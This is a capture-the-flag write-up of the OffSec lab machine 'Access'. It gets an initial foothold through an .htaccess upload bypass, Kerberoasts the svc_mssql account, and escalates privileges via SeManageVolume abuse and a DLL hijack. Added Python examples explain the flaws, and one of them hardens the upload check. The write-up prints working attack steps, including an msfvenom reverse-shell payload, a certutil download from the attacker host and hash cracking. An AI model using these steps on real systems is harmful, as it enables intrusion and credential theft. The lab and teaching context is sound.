Access
Network
- IP target:
192.168.212.187
Enumeration
| Port | Service | Protocol | Note |
|---|---|---|---|
| 53/tcp | domain | DNS | Simple DNS Plus |
| 80/tcp | http | HTTP | Apache 2.4.48 (Win64), PHP 8.0.7 (XAMPP); TRACE enabled |
| 88/tcp | kerberos-sec | Kerberos | KDC: the host is a domain controller |
| 135/tcp | msrpc | MSRPC | |
| 139/tcp | netbios-ssn | SMB | |
| 389/tcp | ldap | LDAP | Domain access.offsec |
| 445/tcp | microsoft-ds | SMB | Signing enabled and required |
| 464/tcp | kpasswd5 | Kerberos | Password change service |
| 593/tcp | http-rpc-epmap | MSRPC | RPC over HTTP |
| 636/tcp | ldapssl | LDAPS | |
| 3268/tcp | globalcatLDAP | LDAP | Global Catalog |
| 3269/tcp | globalcatLDAPssl | LDAPS | Global Catalog |
| 5985/tcp | wsman | WinRM | Microsoft HTTPAPI 2.0 |
| 9389/tcp | adws | ADWS | .NET Message Framing |
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.212.187
[sudo] password for momphucker:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 14:09 CET
Nmap scan report for 192.168.212.187
Host is up (0.068s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49668/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49677/tcp open unknown
49704/tcp open unknown
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ sudo nmap -Pn -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -oN alltcp.txt 192.168.212.187
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 14:14 CET
Nmap scan report for 192.168.212.187
Host is up (0.071s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Access The Event
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-29 13:15:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-29T13:15:10
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ sudo feroxbuster -u http://192.168.212.187 -w /usr/share/dirb/wordlists/big.txt
[...]
[####################] - 36s 20469/20469 574/s http://192.168.212.187/
[####################] - 0s 20469/20469 115644/s http://192.168.212.187/assets/vendor/php-email-form/ => Directory listing
[####################] - 0s 20469/20469 46205/s http://192.168.212.187/assets/vendor/swiper/ => Directory listing
[####################] - 1s 20469/20469 14876/s http://192.168.212.187/assets/img/speakers/ => Directory listing
[####################] - 0s 20469/20469 146207/s http://192.168.212.187/forms/ => Directory listing
[####################] - 1s 20469/20469 16467/s http://192.168.212.187/assets/img/hotels/ => Directory listing
[####################] - 0s 20469/20469 61284/s http://192.168.212.187/assets/css/ => Directory listing
[####################] - 0s 20469/20469 71321/s http://192.168.212.187/assets/vendor/glightbox/ => Directory listing
[####################] - 0s 20469/20469 77242/s http://192.168.212.187/assets/vendor/ => Directory listing
[####################] - 0s 20469/20469 191299/s http://192.168.212.187/assets/ => Directory listing
[####################] - 2s 20469/20469 9932/s http://192.168.212.187/assets/img/ => Directory listing
[####################] - 0s 20469/20469 117638/s http://192.168.212.187/assets/js/ => Directory listing
[####################] - 2s 20469/20469 13096/s http://192.168.212.187/assets/img/venue-gallery/ => Directory listing
[####################] - 0s 20469/20469 103379/s http://192.168.212.187/assets/vendor/aos/ => Directory listing
[####################] - 1s 20469/20469 14854/s http://192.168.212.187/assets/img/gallery/ => Directory listing
[####################] - 0s 20469/20469 53444/s http://192.168.212.187/assets/img/supporters/ => Directory listing
[####################] - 1s 20469/20469 34990/s http://192.168.212.187/assets/vendor/bootstrap/ => Directory listing
[####################] - 35s 20469/20469 592/s http://192.168.212.187/assets/vendor/bootstrap-icons/
[####################] - 34s 20469/20469 599/s http://192.168.212.187/cgi-bin/
[####################] - 0s 20469/20469 284292/s http://192.168.212.187/uploads/ => Directory listing
Port 80
Port 5985
Exploit
It is not possible to upload .php files through the ticket purchase form:
I try uploading an .htaccess file that tells Apache to execute files with a custom extension, .suca, as PHP.
First I create the .htaccess file:
And upload it through the form:
At this point I rename reverse_shell.php to reverse_shell.suca:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ mv reverse_shell.php reverse_shell.suca
I start a listener on port 4455 and upload the .suca file, which succeeds. It shows up under http://192.168.212.187/uploads/, the directory found earlier with Feroxbuster:
Clicking on the file opens a shell on the waiting listener. The fact that the renamed file executes as PHP confirms that Apache honours per-directory .htaccess files in /uploads/ (AllowOverride is not set to None there):
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.212.187] 50007
SOCKET: Shell has connected! PID: 1668
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\uploads>whoami
access\svc_apache
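Why the trick works, as an added example that is not part of the original write-up: the ticket form's real server-side code is not shown, so the vulnerable check below is an assumption modelled on the observed behaviour (".php" rejected, ".htaccess" and ".suca" accepted), and the allowlist in the hardened version is likewise assumed. The script builds the .htaccess directive used above and runs the same sequence of filenames through both validators.

```python
"""
Added example, not code from the original write-up: why an .htaccess upload
defeats a ".php" extension block, and what a fixed validator looks like.

The vulnerable check and the allowlist are assumptions modelled on the
observed behaviour; the ticket form's real server-side code is not on the page.
"""
import os
import re

# --- attacker side -----------------------------------------------------------

def build_htaccess(ext: str) -> str:
    """Per-directory Apache config that makes mod_php execute files with the
    given extension. Dropped into /uploads/ it applies to every file there."""
    ext = ext.lstrip(".")
    return f"AddType application/x-httpd-php .{ext}\n"

# --- vulnerable validator (assumed) ------------------------------------------

# A blacklist only stops what it names. ".suca" is not named, and ".htaccess"
# has no extension at all as far as os.path.splitext is concerned.
BLOCKED_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}

def naive_is_allowed(filename: str) -> bool:
    _, ext = os.path.splitext(filename.lower())
    return ext not in BLOCKED_EXTENSIONS

# --- hardened validator ------------------------------------------------------

# Allowlist of what a ticket form actually needs (assumed set).
ALLOWED_EXTENSIONS = {".pdf", ".png", ".jpg", ".jpeg"}
# Stem restricted to one token with no dots, so "shell.php.jpg" cannot sneak a
# second extension past Apache's multi-extension handling.
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

def hardened_is_allowed(filename: str) -> bool:
    base = os.path.basename(filename)
    if base != filename or base.startswith("."):
        return False          # path components, or a dotfile (.htaccess, .user.ini)
    stem, ext = os.path.splitext(base)
    return ext.lower() in ALLOWED_EXTENSIONS and SAFE_STEM.fullmatch(stem) is not None

def triage(filenames, validator):
    """Return the subset a validator would let onto disk."""
    return [f for f in filenames if validator(f)]

# Constructed upload attempts mirroring the write-up's sequence, plus two extras.
ATTEMPTS = ["reverse_shell.php", ".htaccess", "reverse_shell.suca",
            "ticket.pdf", "shell.php.jpg", "../ticket.pdf"]

if __name__ == "__main__":
    print(build_htaccess("suca"), end="")
    print("naive lets through:   ", triage(ATTEMPTS, naive_is_allowed))
    print("hardened lets through:", triage(ATTEMPTS, hardened_is_allowed))
```

Run with python3: the naive validator lets through everything except the .php name, which is exactly the gap the .htaccess upload exploits. Even with the allowlist in place, the upload directory should carry AllowOverride None and php_admin_flag engine off (or be served from a host that never executes scripts), so that an uploaded .htaccess could not change handler mappings at all.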
Privilege Escalation
I upload and run winPEASany.exe.
I transfer the tools I need:
PS C:\xampp\htdocs\uploads> certutil -urlcache -split -f http://192.168.45.248:8080/wintools.zip
I check whether there are any SPNs to abuse:
PS C:\xampp\htdocs\uploads> setspn -T access.offsec -Q */*
Checking domain DC=access,DC=offsec
CN=SERVER,OU=Domain Controllers,DC=access,DC=offsec
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/SERVER.access.offsec
ldap/SERVER.access.offsec/ForestDnsZones.access.offsec
ldap/SERVER.access.offsec/DomainDnsZones.access.offsec
DNS/SERVER.access.offsec
GC/SERVER.access.offsec/access.offsec
RestrictedKrbHost/SERVER.access.offsec
RestrictedKrbHost/SERVER
RPC/20dae709-54fe-40ec-8c68-4475793b542a._msdcs.access.offsec
HOST/SERVER/ACCESS
HOST/SERVER.access.offsec/ACCESS
HOST/SERVER
HOST/SERVER.access.offsec
HOST/SERVER.access.offsec/access.offsec
E3514235-4B06-11D1-AB04-00C04FC2DCD2/20dae709-54fe-40ec-8c68-4475793b542a/access.offsec
ldap/SERVER/ACCESS
ldap/20dae709-54fe-40ec-8c68-4475793b542a._msdcs.access.offsec
ldap/SERVER.access.offsec/ACCESS
ldap/SERVER
ldap/SERVER.access.offsec
ldap/SERVER.access.offsec/access.offsec
CN=krbtgt,CN=Users,DC=access,DC=offsec
kadmin/changepw
CN=MSSQL,CN=Users,DC=access,DC=offsec
MSSQLSvc/DC.access.offsec
Existing SPN found!
I use Rubeus to retrieve any hashes:
PS C:\xampp\htdocs\uploads\wintools> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : access.offsec
[*] Searching path 'LDAP://SERVER.access.offsec/DC=access,DC=offsec' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : svc_mssql
[*] DistinguishedName : CN=MSSQL,CN=Users,DC=access,DC=offsec
[*] ServicePrincipalName : MSSQLSvc/DC.access.offsec
[*] PwdLastSet : 5/21/2022 5:33:45 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\xampp\htdocs\uploads\wintools\hashes.kerberoast
[*] Roasted hashes written to : C:\xampp\htdocs\uploads\wintools\hashes.kerberoast
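setspn listed three SPN holders (SERVER, krbtgt, MSSQL) but Rubeus reports one roastable user. As an added example, not part of the write-up, the LDAP filter Rubeus printed is evaluated in Python over records constructed from that setspn output; the userAccountControl values are assumptions (the page has no UAC dump), and svc_old is an invented disabled account included to exercise the UAC clause.

```python
"""
Added example, not part of the write-up: the LDAP filter Rubeus printed,
evaluated over the SPN holders that setspn listed, to show why
"Total kerberoastable users : 1".

Account records are constructed from the setspn output on the page; the
userAccountControl values are assumptions, and svc_old is invented.
"""

SAM_NORMAL_USER_ACCOUNT = 805306368   # 0x30000000: user objects
SAM_MACHINE_ACCOUNT     = 805306369   # 0x30000001: computer objects (SERVER$)
UF_ACCOUNTDISABLE       = 0x0002      # bit tested by 1.2.840.113556.1.4.803 (LDAP_MATCHING_RULE_BIT_AND)

def is_kerberoastable(acct: dict) -> bool:
    """(&(samAccountType=805306368)(servicePrincipalName=*)
        (!samAccountName=krbtgt)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"""
    return (
        acct["sAMAccountType"] == SAM_NORMAL_USER_ACCOUNT        # users only: computers excluded
        and bool(acct.get("servicePrincipalName"))               # must hold at least one SPN
        and acct["sAMAccountName"].lower() != "krbtgt"           # krbtgt is never roasted
        and not acct["userAccountControl"] & UF_ACCOUNTDISABLE   # skip disabled accounts
    )

ACCOUNTS = [
    {"sAMAccountName": "SERVER$", "sAMAccountType": SAM_MACHINE_ACCOUNT,
     "userAccountControl": 0x82000,     # assumed: SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION
     "servicePrincipalName": ["ldap/SERVER.access.offsec", "HOST/SERVER.access.offsec"]},
    {"sAMAccountName": "krbtgt", "sAMAccountType": SAM_NORMAL_USER_ACCOUNT,
     "userAccountControl": 0x0202,      # ACCOUNTDISABLE | NORMAL_ACCOUNT (krbtgt default)
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "svc_mssql", "sAMAccountType": SAM_NORMAL_USER_ACCOUNT,
     "userAccountControl": 0x10200,     # assumed: NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
     "servicePrincipalName": ["MSSQLSvc/DC.access.offsec"]},
    {"sAMAccountName": "svc_old", "sAMAccountType": SAM_NORMAL_USER_ACCOUNT,
     "userAccountControl": 0x10202,     # constructed: same as above but disabled
     "servicePrincipalName": ["HTTP/old.access.offsec"]},
]

def roastable(accounts=ACCOUNTS) -> list:
    return [a["sAMAccountName"] for a in accounts if is_kerberoastable(a)]

def why_excluded(acct: dict) -> str:
    """Name the clause that rejects an account, in filter order."""
    if acct["sAMAccountType"] != SAM_NORMAL_USER_ACCOUNT:
        return "not a user object"
    if not acct.get("servicePrincipalName"):
        return "no SPN"
    if acct["sAMAccountName"].lower() == "krbtgt":
        return "krbtgt excluded"
    if acct["userAccountControl"] & UF_ACCOUNTDISABLE:
        return "account disabled"
    return "roastable"

if __name__ == "__main__":
    for a in ACCOUNTS:
        print(f"{a['sAMAccountName']:<10} {why_excluded(a)}")
    print("roastable:", roastable())
```

The filter says nothing about encryption types: an account limited to AES in msDS-SupportedEncryptionTypes is still selected, but its ticket comes back as etype 17/18 and cracks far more slowly; that is what the Supported ETypes line in the Rubeus output reports for svc_mssql (RC4 only, hence the fast mode below).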
I move the file to the Kali machine and check the hash type:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ cat hashes.kerberoast
$krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.access.offsec@access.offsec[...]
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ hashcat --help | grep -i "Kerberos"
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocol
28800 | Kerberos 5, etype 17, DB | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocol
28900 | Kerberos 5, etype 18, DB | Network Protocol
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
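The grep through hashcat --help is the manual version of reading the etype field out of the hash. As an added example (not from the write-up), the parser below does it programmatically, checks the checksum length for the etype, and builds the same hashcat command line. SAMPLE_RC4 is constructed to mirror the svc_mssql line (the real checksum and ciphertext are truncated on the page); SAMPLE_AES is an invented etype 18 line in impacket's layout. Neither is a real ticket.

```python
"""
Added example, not part of the write-up: parse the $krb5tgs$ lines that
Rubeus and impacket emit, recover the etype, and pick the hashcat mode.

SAMPLE_RC4 and SAMPLE_AES are constructed; the hex bodies are filler.
"""
import re

# etype -> hashcat mode for TGS-REP material
HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}
# HMAC length per etype: RC4-HMAC (MD5) is 16 bytes, AES (SHA1-96) is 12 bytes
CHECKSUM_HEX_LEN = {23: 32, 17: 24, 18: 24}

KRB5TGS_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$"
    r"\*?(?P<user>[^$]+)\$(?P<realm>[^$]+)\$"   # Rubeus prefixes the user with '*' for etype 23
    r"(?:\*?(?P<spn>[^$]*)\*\$)?"               # optional "spn*$" (23) or "*spn*$" (17/18, impacket)
    r"(?P<checksum>[0-9a-f]+)\$(?P<edata>[0-9a-f]+)$",
    re.IGNORECASE,
)

def parse_krb5tgs(line: str) -> dict:
    m = KRB5TGS_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5tgs$ hash line")
    etype = int(m["etype"])
    if etype not in HASHCAT_MODE:
        raise ValueError(f"unsupported etype {etype}")
    if len(m["checksum"]) != CHECKSUM_HEX_LEN[etype]:
        raise ValueError(f"etype {etype} checksum should be {CHECKSUM_HEX_LEN[etype]} hex chars")
    spn = (m["spn"] or "").split("@")[0]        # Rubeus appends "@realm" to the SPN
    service_class, _, host = spn.partition("/")
    return {
        "etype": etype,
        "hashcat_mode": HASHCAT_MODE[etype],
        "user": m["user"],
        "realm": m["realm"],
        "spn": spn,
        "service_class": service_class,
        "host": host,
        "edata_bytes": len(m["edata"]) // 2,
    }

def identify_mode(line: str):
    """hashcat -m value for a line, or None if it is not a usable TGS-REP hash."""
    try:
        return parse_krb5tgs(line)["hashcat_mode"]
    except ValueError:
        return None

def hashcat_argv(hashfile: str, parsed: dict, wordlist="/usr/share/wordlists/rockyou.txt"):
    """Command line matching the one used below, with the mode chosen from the hash."""
    return ["hashcat", "-m", str(parsed["hashcat_mode"]), hashfile, wordlist,
            "-r", "/usr/share/hashcat/rules/best64.rule"]

SAMPLE_RC4 = ("$krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.access.offsec@access.offsec*$"
              + "a1" * 16 + "$" + "b2" * 40)
SAMPLE_AES = ("$krb5tgs$18$svc_aes$ACCESS.OFFSEC$*HTTP/web.access.offsec*$"
              + "c3" * 12 + "$" + "d4" * 40)

if __name__ == "__main__":
    for s in (SAMPLE_RC4, SAMPLE_AES):
        p = parse_krb5tgs(s)
        print(p["user"], p["spn"], "-> hashcat -m", p["hashcat_mode"])
```

The checksum-length check matters in practice: a line with the wrong length for its etype will not be accepted by hashcat either, and catching it here is cheaper than a failed cracking run. SPNs containing a literal "$" are not handled, since the format itself uses "$" as the separator.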
I proceed to crack the hash with hashcat:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
The password trustno1 is found for the user svc_mssql.
It is not possible to connect with Evil-WinRM: WinRMAuthorizationError is the 401 from the WinRM endpoint, so the credentials are accepted but svc_mssql is not permitted to log on over WinRM:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ evil-winrm -i 192.168.212.187 -u svc_mssql -p 'trustno1'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
And there is nothing useful over SMB either: the credentials are valid, but svc_mssql only gets the default read access to IPC$, NETLOGON and SYSVOL:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ crackmapexec smb 192.168.212.187 -u 'svc_mssql' -p 'trustno1' --shares
SMB 192.168.212.187 445 SERVER [*] Windows 10 / Server 2019 Build 17763 x64 (name:SERVER) (domain:access.offsec) (signing:True) (SMBv1:False)
SMB 192.168.212.187 445 SERVER [+] access.offsec\svc_mssql:trustno1
SMB 192.168.212.187 445 SERVER [+] Enumerated shares
SMB 192.168.212.187 445 SERVER Share Permissions Remark
SMB 192.168.212.187 445 SERVER ----- ----------- ------
SMB 192.168.212.187 445 SERVER ADMIN$ Remote Admin
SMB 192.168.212.187 445 SERVER C$ Default share
SMB 192.168.212.187 445 SERVER IPC$ READ Remote IPC
SMB 192.168.212.187 445 SERVER NETLOGON READ Logon server share
SMB 192.168.212.187 445 SERVER SYSVOL READ Logon server share
At this point I check whether I can use RunasCs to run a process as svc_mssql with the cracked password:
C:\xampp\htdocs\uploads>powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\uploads> Import-Module .\Invoke-RunasCs.ps1
PS C:\xampp\htdocs\uploads> Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami"
[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
access\svc_mssql
I open a listener on port 4477, create an executable with msfvenom, and upload it to the target machine:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.248 LPORT=4477 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe
I run it as svc_mssql:
PS C:\xampp\htdocs\uploads> Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "reverse.exe"
[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
No output received from the process.
And the shell opens on port 4477:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ nc -nvlp 4477
listening on [any] 4477 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.212.187] 50715
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
access\svc_mssql
C:\Windows\system32>
I retrieve the local.txt flag:
I check the privileges:
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================ ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
I try to abuse SeManageVolumePrivilege with the SeManageVolumeExploit tool. The privilege shows as Disabled in whoami /priv, but that only describes the current token state: a process can re-enable any privilege present in its token with AdjustTokenPrivileges, so Disabled is not the same as absent. Once run, the tool makes C:\ writable:
C:\xampp\htdocs\uploads>SeManageVolumeExploit.exe
SeManageVolumeExploit.exe
Entries changed: 929
DONE
C:\xampp\htdocs\uploads>echo "suca" > c:\suca.txt
echo "suca" > c:\suca.txt
C:\xampp\htdocs\uploads>type c:\suca.txt
type c:\suca.txt
"suca"
Info
One possible way to get a shell from here is to write a custom DLL to C:\Windows\System32\wbem\tzres.dll and call systeminfo to trigger it.
I create the malicious DLL:
I copy the DLL into C:\Windows\System32\wbem\, start a listener on port 4488 and invoke systeminfo. The legitimate tzres.dll lives in C:\Windows\System32, so this is a DLL search-order hijack from a directory made writable by the previous step, not an overwrite of the real library:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ nc -nvlp 4488
listening on [any] 4488 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.212.187] 51066
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\network service
I retrieve the proof.txt flag: